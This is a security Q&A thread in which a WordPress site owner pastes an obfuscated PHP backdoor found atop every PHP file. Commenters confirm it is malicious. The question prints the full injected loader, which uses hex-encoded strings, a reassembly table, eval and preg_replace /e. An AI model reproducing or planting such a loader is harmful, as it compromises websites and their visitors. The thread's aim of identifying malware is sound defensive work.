1

I'm pretty sure that we have malware code in our WordPress website - Here is the code in question, it is located at the top of every php file in the website;

{ $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) && (! strstr($ua,"\x72\166\x3a\61\x31")) && (! strstr($ua,"\x61\156\x64\162\x6f\151\x64")) && (! strstr($ua,"\x6d\157\x62\151\x6c\145")) && (! strstr($ua,"\x69\160\x68\157\x6e\145")) && (! strstr($ua,"\x69\160\x61\144")) && (! strstr($ua,"\x6f\160\x65\162\x61\40\x6d"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $asxjhvtsgx = '2]y76]62]y3:]84#-!OVMM*<85csboe))1%x5c%x782f35.)1%x5c%x782f14+9**-)1%x5c%x782f2986+7**^%x5c%x7860%x5c%x785c^>Ew:Qb:Qc:W~!%x5c%x7825z!>2<!gps)%x5c%x7825j>1<%x57825c:>1<%x5c%x7825b:>1<!gps)%x5c%x78x5c%x7822)!gj}1~!<2p%x5c%x7825%x5c%x787f!~!<##!>!2p%x5x7825tjw!>!#]y84]275#Y#-#D#-#W#-#C#-#O#-#N#*%x5c%x787825V%x5c%x7827{ftmfV%x5c%x787f<*X&Z&S{ftmfV%x5c%x787f<*XAZASV<*24%x5c%x782f%x5c%x7825kj:-!OVMM*<(<%x5c%x78e%xw%x5c%x7825)ppde>u%x5c%x7825V<#65,47R25,d::::::-111112)eobs%x5c%x7860un>qp%x5c%x7825!|Z~!<##!>!2p%x5c%x7825!|!MFT%x5c%x7860QIQ&f_UTPI%x5c1GO%x5c%x7822#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%xy74]256#<!%x5c%x7825ggg)(0)%x5c%x782f+*0f(-!#]y76]277x782f7#@#7%x5c%x782f7^#iubq#%x5c%x785cq%x5c%x7825%x5c%x7827jsv%x5*j%x5c%x7825!-#1]#-bubE{h%x5c%x7825)tp5fubmgoj{h1:|:*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:*61"])))) { $GLOBALS["%x61%1568]248]y83]256]y81]265]y72]254]y76]61]y33]68]y34]68]y}.;%x5c%x7860UQPMSVD!-id%x5c%x7825)uqpuft%x5c%x7860msvd},;uqpuf%x7825<#462]47y]252]18y]#>q%x5c%x7825<#762]67y]562]38y]57]y72]265]y39]271]y83]256]y7CW&)7gj6<.[A%x5c%x7827&6<%;!opjudovg}k~~9{d%x5c%x782<.4%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%2]48y]#>m%x5c%x7825:|:78Bsfuvso!sboepn)%x5c%x7825epnbss-%x5c%x7825r%c%x78246767~6<Cw6<pd%x5c%x7825w67827pd%x5c%x78256|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyx5c%x7825)utjm!|!*5!%x5c%x5c%x782f%x5c%x7825r%x5c%x7878<~!!%x5x5c%x7824-%x5c%x7824%x5c%x785c%x5c%x7825j^%x5c%x7824-%x5c%x782]y83]248]y83]256]y81]265]y72]254]y76#<%x5c%x7825tmw!>!#]y84]275]y83]2bek!~!<b%x5c%x7825%x5c%x787f!<X>b%x5c%x7825Z<#opo#>b%x5c%x7825!*##>>>!%x5c%x78242178}527}88:}334}472%x5c%x7824<!%x5c%x7825mm!>!#]f#00;quui#>.%x5c%x7825!<***f%x5c%x7827,*e%x5c%x78x5c%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7y81]273]y76]258]y6g]273]y76]27%163%x74%162%x5f%163%x70%154%x69%164%50%x22%134%x78%62%x35%165%x5c%x782272qj%x5c%x7825)7gj6825tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<%x5c%x7825G]y6d]281Ld]245]25j:>1<%x5c%x7825j:=tj{fpg)%)323zbe!-#jt0*?]+^?]_%x5c%x785c}X%x5c%x7824<!%x7825)7fmji%x5c%x78786<C%x5c%x7827&6<*rfs%x5c%x78257-K)fujs%x5c%!|!*nbsbq%x5c%x7825)323ldfidk!~!<**qp%x5c%p!*#ojneb#-*f%x5c%x7825)sf%x5825c*W%x5c%x7825eN+#Qi%x5c%x785c1^W%x5c%x7825c!>!%x5273]y76]271]y7d]252]y33]65]y31]53]y6d]281]y43]78]y33]65]y31]55]y85]8c%x785cSFWSFT%x5c%x7860%x5c%x782782f#%x5c%x782f},;#-#}+;%x5!gj<*#k#)usbut%x5c%x7860cpV%x5c%x787f%x5c%x787f%x5c%x83:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#ujoj824-%x5c%x7824y4%x5c%x7824-%x5c%x7824]y8%x5c%x7824-%x5c%x7824]26%UUI&c_UOFHB%x5c%x7860SFTV%x5c%x7860QUUI&b%x5c%x7825!|!*)323z*#sfmcnbs+yfeobz+sfwjidsb%x5c%x7860bj+upcotn+qsvmt+fmhpph#)zbssbdof.)fepdof.%x5c%x782f#@#%x5c%x782fqp%x5c%x7825>5h%x5c%x7825!<*f%x5c%x7825z<jg!)%x5c%x7825z>>2*!%x5c%x7825z>3<!fmtf!%urn chr(ord($n)-1);} @error_report7825kj:!>!#]y3d]51]y35]256]y76]72]y3d]51]y35]274]y4:]x5c%x78256<^#zsfvr#%x5c%x785cq%x5c%x78257%x5c%]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]317]445]21c%x7825>%x5c%x782fh%x5c%x7825:<**#57]38y4tvctus)%x5c%x7825%x5c%x7824-%x5c%x7824x5c%x7825_t%x5c%x7825:osvufs:~:<*9-1-r%x5c%x7825)s%x5q%x5c%x7825>2q%x5c%x7825<#g6R85,825!-#2#%x5c%x782f#%x5c*r%x5c%x7825:-t%x5c%x7825)3of:opjudovg<~%x5c%x7824<!%x5c%x7825o:!82]y3:]62]y4c#<!%x5c%x7825t::!>!%x5c%x7824Ypp3)%x5c%x75%156%x61"]=1; function fjfgg($n){retx5c%x7825z>2<!%x5c%x7825ww2)%x5cRk3%x5c%x7860{666~6<&w6<%x5c%x787fw6*!fyqmpef)#%x5c%x7824*<!%x5c%xx78256<*Y%x5c%x7825)fnbozcYufhA%x5c%x78272qj%x5c%x7825)gpf{jt)!gj!<*2bd%x5c%x7825-#%x7824-%x5c%x7824-!%x5c#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x7825)x5c%x7824-%x5c%x7824<%x5c%x7825j,,*!|%x5c%x825j:>>1*!%x5c%x7825b:>1<!fmtx7860GB)fubfsdXA%x5c%x7827K6<%x5c%x787fw6*3qj%x5c%x78257>%825+*!*+fepdfe{h+{d%x5c%x7825)+opjudovg+)!gj+{e%x5cc%x7825-qp%x5c%x7825)54l}%x,j%x5c%x7825>j%x5c%x7825!*3!%x5c%x7827!hmg%x5c%x7825!)!gj!<2,9275ttfsqnpdov{h19275j{hnpd19272p%x5c%x7825!*3>?*2b%3of>2bd%x5c%x7825!<5h%x5c%x7825%x5c%x782f#0#%x55s:%x5c%x785c%x5c%x7825j:^<!%x5c%x7825w%057ftbc%x5c%x787f!|!*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%x7825%x5y3e]81#%x5c%x782f#7e:55946-tr.984:7597-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOd#)tutjyf%x5c%x7860opjudovg%%x5c%x78257-C)fepmqnjA%c%x7825j=6[%x5c%x7825ww2!>27,*d%x5c%x7827,*c%x5c%x7827,*b%x5c%x7827)fepc%x787fw6*CW&)7gj6<*K)ftpmdXA6~6<u%x5c%x78257>%x5c%x782f7&6|7**11%x7860QUUI&e_SEEB%x5c%x7860FUPNFS&d_SFSFGFS%x5c%x7860Q57%x65","%x65%166%x61%154%x28%151%x6d%160%x6c%7825-*.%x5c%x7825)euhA)824*<!%x5c%x7824-%x5c%x7824gps)%x5c%x7825j>1<%x5c%x%x7825%x5c%x7824-%x5c%x7824*!|!%]1%x5c%x782f20QUUI7jsv%x5c%x78257UFH#%x5c%x7827rc%x782f*#npd%x5c%x782f#)rrd%x5c%x7821]y7d]252]y74]256#<!%x5c%x7825ff2!>!bssbz)%x5c%x7824]25%x5c3:]68]y76#<%x5c%x78e%x5c%x78b%x5c%x7825w:!>!%x55c%x7825-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA!osvufs!~<3r.93e:5597f-s.973:8297f:5297e:56-%x5c%x7878r.985:52985-t.98]K4]%x5c%x7827pd%x5c%x782_*#[k2%x5c%x7860{6:!}7;!}6;##}C;!>>!}W;u%x7825cB%x5c%x7825iN}#-!tussfw)%x5c%x7!-#}#)fepmqnj!%x5c%x782f!#0#)idubn%x5c%x7860hfsq)!s73]y76]277#<%x5c%x7825t2w>#]y74]273]y765c%x7827;%x5c%x7825!<*#}_;#)323ldfid>}&;!osvufs}%x5c%x787f]47]67y]37]88y]27]28y]#%x5c%x782fr%c%x7878pmpusut)tpqssutRe%x5c%x7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cd2bge56+99386c6f+9f5d81*#ppde#)tutjyf%x5c%x78604%#zsfvr#%x5c%x785cq%x5c%x7825)ufttj%tutjyf%x5c%x7860opjudovg)74]256]y39]252]y83]273]y72]282#<!%x5c%f%x5c%x7824)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%x5c%x725bbT-%x5c%x7825bT-%x5c%x7825hW~%)%x5c%x7825tww**WYsboepn)%x5c%x7825bss-%x5c%x7825r%x5c%x7878B%x5c%x7825fdy)##-!#~<%x5c%x5}X;!sp!*#opo#>>}R;msv}.;%x5c%x782f#%x5c%x5c%x7827;mnui}&;zepc}A;~!}%x25tpz!>!#]D6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%x782f#M5]x5c%x7825h>#]y31]278]y3e]81]K78:56985:6197g:74985-rc%x7827{**u%x5c%x7825-#jt0}Z;0]=]0#)2q%x5c%x7825l}S;2-u%x5c%x7b!>!%x5c%x7825yy)#}#-#%x5c%x7824-%x5c%x7824-tusqpt)%x5c%x78%x7825!|!*#91y]c9y]g2y]#>>*4-1-bubE{c%x7825i%x5c%x785c2^<!Ce*[!%x5c%x787824-%x5c%x7824gvodujpo!%x5c%x7824-%xh%x5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x7825)j{hnpd!opjudovg!|!**#j{hnp5c%x787f;!|!}{;)gj}l;33bq}k;opjudovg}%x5c%x7878;0]=])0#)U!%x5Z6<.5%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6fs%x5c%x7825w6<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*idSVUFS,6<*msv%x5c%x78257-MSV,6<*)ujojR%x5c%x7827id%x5c%x78b:<!%x5c%x7825c:>%x5c%x7825c%x787fw6*CW&)7gj6<*doj4]275]y7:]268]y7f#<!%x5c%x7825tww!>!%x5c%x782400~:<h%%x7825!osvufs!*!+A!>!{e%x5c%x7825)!>>%x5c%x7822!ftmbg)f%x5c%x7827*&7-n%x5c%x7825)utjm6<%x5%x7825w%x5c%x7860TW~%x5c%x7824<%x5c%x78e%x5c%x78b%x5c%x7825mm)%x5c%x22%51%x29%51%x29%73", NULL); }5c%x787fw6*%x5c%x787f_*#fmjgk4%x5c%x7860{6~6<t78{**#k#)tutjyf%x5c%x7860%x5c%x7878%x5c%x7822l:!}V;3q%x5c%x7825%x7827pd%x5c%x78256<C%x5c%x]252]y85]256]y6g]257]y86]267]y7-Ez-1H*WCw*[!%x5c%x7825rN}#QwTx7825-#+I#)q%x5c%x7825:>:r%x5c%x7825:|:**t%x5c%x76:+946:ce44#)zbssb!>!ssbnpe_G65]D8]86]y31]278]y3f]51L3]84]y31M6]%x5c%x7825)kV%x5c%x78tpi}Y;tuofuopd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt!gj!~<ofmy%x5c%x7825,3,j%x5c%x7825>j%x5c%x7825!<**DgP5]D6#<%x5c%x7825fdy>#]D4]273]D6Pvodujpo)##-!#~<#%x5c%x782f%x5c%x7825%x5c%x7824-%x5c%x7824!>x5c%x7825tzw>!#]y76]277]y72]265]y39]274]y85]273]y6g])sutcvt-#w#)ldbqov>*ofmy%%x5c%x7825}K;%x5c%x7860ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%x7825)if((function_exists("%x6f%142%x5f%163%x74%141%x72%164") &&c%x7825s:N}#-%x5c%x7825o:W%x5c%x1127-K)ebfsX%x5c%x7827u%x5c%-%x5c%x7824*<!~!dsfbuf%x5c%x7860gx7825!-uyfu%x5c%x7825)3of)fepdof%x5c%x786K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%x5c%x7825bG9}:}.}-}!#*<%x5c%x7825nfing(0); preg_replace("%x2f%50%x2e%52%x29%c%x7822!pd%x5c%x7825)!gj}Z;h!opjudovg}{;#)8%42%x66%152%x66%147%x67%42%x2cx7878X6<#o]o]Y%x5c%x78257;utpI#7>%x5c%x782f7rfs%x5c%x78256<#ofs%x5c%x78256~6<%x5c%x787fw6<*K)ftpmdXA6|7**197-2qjW%x5c%x7825hIr%x5c%x785c1^-%x5c%x7825r%x5c%x785c2^-%x5c%x7825hOh%x5c%d>%x5c%x7825fdy<Cb*[%x5c%x7825h!>!%x5c%x7825tdz)%x5c%x7825cIjQeTQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x782]445]43]321]464]284]364]6]234]342]58]24]31#-%x5c%x7825tdz*Wsfuvso!qsut>j%x5c%x7825!*72!%x5c%x782787f%x5c%x787f<u%x5c%xUT%x5c%x7860LDPT7-UFOJ%x5c%t%x5c%x7860msvd}+;!>!}%x5c%x7827;!>>>!}_;gvc%x55c%x78b%x5c%x7825ggg!>!#]y81]273]y76]258]y6g]273]y76]271]y7d]252]%x5c%x78257-K)udfoopdXA%x5c%x7822)7gj6<*QDU%x5c%x7860MPT7-NBFS5]241]334]368]322]3]364]6]283]427]36]373P667R37,18R#>q%x5c%x7825V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*wx782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x5c%x7825tmwc%x7825}&;ftmbg}%x5c%x787f;!osvufs}w;*%x5c%x787f!>>%x5tmbg39*56A:>:8:|:7#6#)tutjyf%x5c%x786043c%x7825Z<^2%x5c%x785c2b%x5c%x7825!>!%x7825%x5c%x7878:-!%x5c%x7825tzw%x5c%x78225z-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5c%x7860sfqmbdf)%x5c%x7825%x5c%x7%x5c%x7825)ftpmdR6<*id%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78256<*1%x5c%x7825bss%x5c%x77825:<#64y]552]e7y]#>n%x5c%x7825<#372]58y]472]37y]672]48y]#>s%x5cx5c%x78223}!+!<+{e%x5c%x75c%x7825z>!tussfw)%x5c%x7825zW%x5c%x7825h>EzH,2W%x5c%x7825wN;#fubfsdXk5%x5c%x7860{66~6<&w6<%xx5c%x787fw6*%x5c%x787fc%x78256<C>^#zsfvr#%x5c%x785cq%x5c%x78257**^x5c%x7878W~!Ypp2)%x5c%x7825zB%x#p#%x5c%x782f#p#%x5c%x782825)m%x5c%x7825=*h%x5c%x7825)m%x5c%x7825):fmji%x5c%x7878:<##:>:h%x5c%x!gj!|!*msv%x5c%x7825)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%x<**2qj%x5c%x7825)hopm3qjA)qj3hopmA%x5c%x78273qj%x5c%7825h00#*<%x5c%x7825nfd)##Qtpz)#]341]88M4P8]37]278]22X)!gjZ<#opo#>b%x5c%x7825!**X)ufttj%x5c%x7822)gj3-j%x5c%x7825-bubE{h%x5c%x7825x5c%x7827&6<.fmjgA%x5c%x7827doj%x5c%x78256<%xx3a%146%x21%76%x21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y7R17,67R37,#%x5c%x782fq%x5c%x7825>U<#1 (!isset($GLOBALS["%x61%156%x75%156%x157%x64%145%x28%141%x72%162%x61%171%x5f%155%x61%160%x2*!***b%x5c%x7825)sf%x5c%x7878pmpusut!-#j0#!%x5c%x782f!*6<.msv%x5c%x7860ftsbqA7>q%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#f!%x5c%x7825b:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:.2^,%x5c%x782556<pd%x5c%x7825w6Z6<.2%x5c%x7860hA%x5c6,47R57,27R66,#%x5c%x782f%x7825#%x5c%x782f#o]#%x5c%x782f*5c%x7824y7%x5c%x7824-%x5c%x7x5c%x7822)gj6<^#Y#%x5c%x785cq%x5c%x7825%x5c%x7827Y%x5c%x78255:osvufs:~928>>%x5c%x7822:fx5c%x7825w6Z6<.3%x5c%x7860hAx5c%x7825%x5c%x782fh%x5c%x7825)n%x5c%7!hmg%x5c%x7825)!gj!<2,*j%x5c%x7825-#1]}U;y]}R;2]},;osvufs}%x{h%x5c%x7825)sutcvt)esp>hmg%x5c%x7825!<12>j%x5c7825j=tj{fpg)%x5c%x7825%x5c%x7824x7827!hmg%x5c%x7825)!gj!|!*1?hmg%x5c%x7825)!gj!<**2-4-bubE/(.*)/epreg_replaceksaeifhsch'; $hfrdbrahhc = explode(chr((163-119)),'7137,58,9360,37,802,29,3201,40,2709,34,7396,41,4301,46,9397,54,7479,31,1719,63,9261,61,4596,47,1192,32,6016,57,1082,42,9842,28,4760,21,9632,38,6582,27,1224,55,6339,36,4182,65,7227,28,1948,64,7510,61,4453,48,7571,51,8058,62,7919,27,3583,58,1782,28,9034,52,3339,45,2796,46,648,65,8808,44,5161,35,9755,60,9506,63,8755,31,6208,24,4088,23,9216,45,6473,46,6073,52,8518,65,4021,39,6125,57,2369,34,3273,37,1030,26,8786,22,4781,40,6804,48,7073,64,883,63,7946,47,8277,54,7437,42,5196,25,8978,56,4643,54,3719,61,713,38,7867,30,9907,39,3445,66,6852,50,9186,30,7048,25,1279,25,10048,58,9968,47,5778,36,5886,69,4060,28,195,54,8371,36,3811,21,3384,38,548,47,4347,23,3832,47,4501,36,1601,49,4137,45,2592,63,452,69,9451,55,2528,64,4859,51,2054,29,5042,25,5067,68,6719,29,521,27,4247,54,2468,60,1472,68,9139,47,2012,42,7288,41,3919,65,2203,32,5479,42,2235,27,3692,27,4949,58,1056,26,9815,27,8331,40,3780,31,751,51,5135,26,8668,25,3641,51,6285,54,2262,53,7897,22,301,64,411,41,9322,38,9670,25,3030,32,8162,59,6783,21,6519,63,9946,22,5521,28,5955,61,5657,62,3062,23,9695,32,1902,46,6996,52,2135,21,5221,38,249,20,1403,69,4910,39,6609,31,6232,53,2977,53,2898,40,5007,35,9870,37,6670,49,8908,70,8603,65,946,57,1124,22,3085,65,1540,61,1689,30,4537,59,3422,23,4421,32,1341,62,2938,39,5719,59,8448,70,2403,65,3511,43,5849,37,9727,28,4370,51,10015,33,7255,33,6937,59,3310,29,2743,53,3150,51,4821,38,2083,52,5814,35,7747,53,1146,46,8852,31,8693,62,6640,30,7622,69,8221,56,5391,62,5606,51,4697,63,6748,35,3984,37,2315,54,5549,57,6902,35,5319,39,1810,64,7329,67,7691,56,5358,33,5453,26,9086,53,8120,42,2842,56,7800,67,8583,20,24,64,1304,37,7195,32,158,37,1874,28,1650,39,3554,29,9569,63,6182,26,3879,40,88,70,4111,26,8883,25,2655,54,3241,32,6375,66,8407,41,5259,60,269,32,365,46,7993,65,595,53,1003,27,831,52,2156,47,0,24,6441,32'); $kactddylvg=substr($asxjhvtsgx,(59690-49584),(38-31)); if (!function_exists('fjfpxissva')) { function fjfpxissva($wrevsiuhaw, $fwamswycvq) { $muhwpwyakd = NULL; for($fbryohbneh=0;$fbryohbneh<(sizeof($wrevsiuhaw)/2);$fbryohbneh++) { $muhwpwyakd .= substr($fwamswycvq, $wrevsiuhaw[($fbryohbneh*2)],$wrevsiuhaw[($fbryohbneh*2)+1]); } return $muhwpwyakd; };} $ejucbogwei="\x20\57\x2a\40\x67\153\x68\153\x63\157\x78\160\x6b\164\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x31\63\x36\55\x39\71\x29\51\x2c\40\x63\150\x72\50\x28\62\x39\62\x2d\62\x30\60\x29\51\x2c\40\x66\152\x66\160\x78\151\x73\163\x76\141\x28\44\x68\146\x72\144\x62\162\x61\150\x68\143\x2c\44\x61\163\x78\152\x68\166\x74\163\x67\170\x29\51\x29\73\x20\57\x2a\40\x74\172\x77\167\x66\152\x78\154\x6c\146\x20\52\x2f\40"; $wyrycvdopb=substr($asxjhvtsgx,(49319-39206),(43-31)); $wyrycvdopb($kactddylvg, $ejucbogwei, NULL); $wyrycvdopb=$ejucbogwei; $wyrycvdopb=(597-476); $asxjhvtsgx=$wyrycvdopb-1; ?>

I'd just like to confirm if this is malicious code or not.. If so, what is it designed to do?

(Mainly I'd just like a yes or no answer to whether it is malicious or not so I can take appropriate action)

Thanks in advance

Sam Bonell
  • 21
  • 3
  • 2
    Seems similar to the code [here](http://security.stackexchange.com/questions/70579/is-this-a-backdoor). I'd need some tooling to get past the obfuscation. – S.L. Barth Jul 20 '15 at 13:38
  • Thanks for the quick reply - Could you confirm that this is malicious? – Sam Bonell Jul 20 '15 at 13:40
  • Yes it is definitely malicious; I had to deal with [similar code on my own server](http://security.stackexchange.com/questions/84454/need-help-deobfuscating-malicious-php) recently. Some antivirus scanners will even detect it - here are the [scan results](https://www.virustotal.com/en/file/ee94a4c6220cb71c754327c347e1edfda81f02f97e9ce17809dda6bf79f41893/analysis/1437433879/) after uploading the code to Virustotal. (Though it's only Avast and ESET, that's just because not many AV scanners are tuned to detect malicious PHP.) – tlng05 Jul 20 '15 at 23:20

1 Answers1

5

Let's see what we know about this code:

  1. It is obfuscated
  2. You didn't put it there

So it is malicious beyond reasonable doubt.

dr_
  • 5,109
  • 4
  • 20
  • 30
  • Thanks - That's all I needed, In a dispute with the "Web developer". Doesn't believe me that there is malicious code in the website and is telling me all kinds of rubbish. – Sam Bonell Jul 20 '15 at 14:52
  • So, according to him, what would it be? – dr_ Jul 20 '15 at 15:15
  • He assumed that I had no knowledge of the topic and refused to even check the top line of the code. Basically he said the reason for the issues is that a past employee has passwords (Which they don't) and is deleting files. Very rude indeed. – Sam Bonell Jul 20 '15 at 15:16
  • Time to find a new web developer. – dr_ Jul 21 '15 at 07:01